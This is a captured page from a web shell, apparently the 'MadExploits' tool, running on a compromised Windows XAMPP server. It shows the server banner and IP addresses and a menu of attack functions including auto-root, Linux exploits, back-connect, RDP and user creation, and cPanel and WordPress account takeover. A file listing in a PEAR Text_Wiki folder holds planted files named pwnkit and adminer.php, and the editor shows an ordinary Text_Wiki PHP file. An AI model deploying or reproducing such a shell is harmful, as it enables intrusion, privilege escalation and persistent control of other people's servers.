Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
Text /
Wiki /
Render /
Xhtml /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Address.php
1.05
KB
-rw-rw-rw-
Anchor.php
1.21
KB
-rw-rw-rw-
Blockquote.php
1.85
KB
-rw-rw-rw-
Bold.php
1.37
KB
-rw-rw-rw-
Box.php
1.52
KB
-rw-rw-rw-
Break.php
1.25
KB
-rw-rw-rw-
Center.php
1.51
KB
-rw-rw-rw-
Code.php
4.31
KB
-rw-rw-rw-
Colortext.php
1.77
KB
-rw-rw-rw-
Deflist.php
2.01
KB
-rw-rw-rw-
Delimiter.php
1.17
KB
-rw-rw-rw-
Embed.php
1.15
KB
-rw-rw-rw-
Emphasis.php
1.39
KB
-rw-rw-rw-
Font.php
2.04
KB
-rw-rw-rw-
Freelink.php
1003
B
-rw-rw-rw-
Function.php
3.44
KB
-rw-rw-rw-
Heading.php
2.41
KB
-rw-rw-rw-
Horiz.php
1.25
KB
-rw-rw-rw-
Html.php
1.14
KB
-rw-rw-rw-
Image.php
5.92
KB
-rw-rw-rw-
Include.php
883
B
-rw-rw-rw-
Interwiki.php
3.05
KB
-rw-rw-rw-
Italic.php
1.38
KB
-rw-rw-rw-
List.php
4.62
KB
-rw-rw-rw-
Newline.php
888
B
-rw-rw-rw-
Page.php
1.16
KB
-rw-rw-rw-
Paragraph.php
1.4
KB
-rw-rw-rw-
Phplookup.php
2.28
KB
-rw-rw-rw-
Plugin.php
1.22
KB
-rw-rw-rw-
Prefilter.php
1.04
KB
-rw-rw-rw-
Preformatted.php
1.22
KB
-rw-rw-rw-
Raw.php
1.17
KB
-rw-rw-rw-
Revise.php
1.66
KB
-rw-rw-rw-
Smiley.php
2.55
KB
-rw-rw-rw-
Specialchar.php
1.61
KB
-rw-rw-rw-
Strong.php
1.4
KB
-rw-rw-rw-
Subscript.php
1.4
KB
-rw-rw-rw-
Superscript.php
1.4
KB
-rw-rw-rw-
Table.php
3.41
KB
-rw-rw-rw-
Tighten.php
882
B
-rw-rw-rw-
Titlebar.php
1.4
KB
-rw-rw-rw-
Toc.php
2.83
KB
-rw-rw-rw-
Tt.php
1.38
KB
-rw-rw-rw-
Underline.php
1.39
KB
-rw-rw-rw-
Url.php
3.97
KB
-rw-rw-rw-
Wikilink.php
5.82
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : List.php
<?php // vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: /** * List rule end renderer for Xhtml * * PHP versions 4 and 5 * * @category Text * @package Text_Wiki * @author Paul M. Jones <pmjones@php.net> * @license http://www.gnu.org/copyleft/lesser.html LGPL License 2.1 * @version CVS: $Id: List.php 200073 2005-11-06 10:38:25Z toggg $ * @link http://pear.php.net/package/Text_Wiki */ /** * This class renders bullet and ordered lists in XHTML. * * @category Text * @package Text_Wiki * @author Paul M. Jones <pmjones@php.net> * @license http://www.gnu.org/copyleft/lesser.html LGPL License 2.1 * @version Release: @package_version@ * @link http://pear.php.net/package/Text_Wiki */ class Text_Wiki_Render_Xhtml_List extends Text_Wiki_Render { var $conf = array( 'css_ol' => null, 'css_ol_li' => null, 'css_ul' => null, 'css_ul_li' => null ); /** * * Renders a token into text matching the requested format. * * This rendering method is syntactically and semantically compliant * with XHTML 1.1 in that sub-lists are part of the previous list item. * * @access public * * @param array $options The "options" portion of the token (second * element). * * @return string The text rendered from the token options. * */ function token($options) { // make nice variables (type, level, count) extract($options); // set up indenting so that the results look nice; we do this // in two steps to avoid str_pad mathematics. ;-) $pad = str_pad('', $level, "\t"); $pad = str_replace("\t", ' ', $pad); switch ($type) { case 'bullet_list_start': // build the base HTML $css = $this->formatConf(' class="%s"', 'css_ul'); $html = "<ul$css>"; /* // if this is the opening block for the list, // put an extra newline in front of it so the // output looks nice. if ($level == 0) { $html = "\n$html"; } */ // done! return $html; break; case 'bullet_list_end': // build the base HTML $html = "</li>\n$pad</ul>"; // if this is the closing block for the list, // put extra newlines after it so the output // looks nice. if ($level == 0) { $html .= "\n\n"; } // done! return $html; break; case 'number_list_start': if (isset($format)) { $format = ' type="' . $format . '"'; } else { $format = ''; } // build the base HTML $css = $this->formatConf(' class="%s"', 'css_ol'); $html = "<ol{$format}{$css}>"; /* // if this is the opening block for the list, // put an extra newline in front of it so the // output looks nice. if ($level == 0) { $html = "\n$html"; } */ // done! return $html; break; case 'number_list_end': // build the base HTML $html = "</li>\n$pad</ol>"; // if this is the closing block for the list, // put extra newlines after it so the output // looks nice. if ($level == 0) { $html .= "\n\n"; } // done! return $html; break; case 'bullet_item_start': case 'number_item_start': // pick the proper CSS class if ($type == 'bullet_item_start') { $css = $this->formatConf(' class="%s"', 'css_ul_li'); } else { $css = $this->formatConf(' class="%s"', 'css_ol_li'); } // build the base HTML $html = "\n$pad<li$css>"; // for the very first item in the list, do nothing. // but for additional items, be sure to close the // previous item. if ($count > 0) { $html = "</li>$html"; } // done! return $html; break; case 'bullet_item_end': case 'number_item_end': default: // ignore item endings and all other types. // item endings are taken care of by the other types // depending on their place in the list. return ''; break; } } } ?>
Close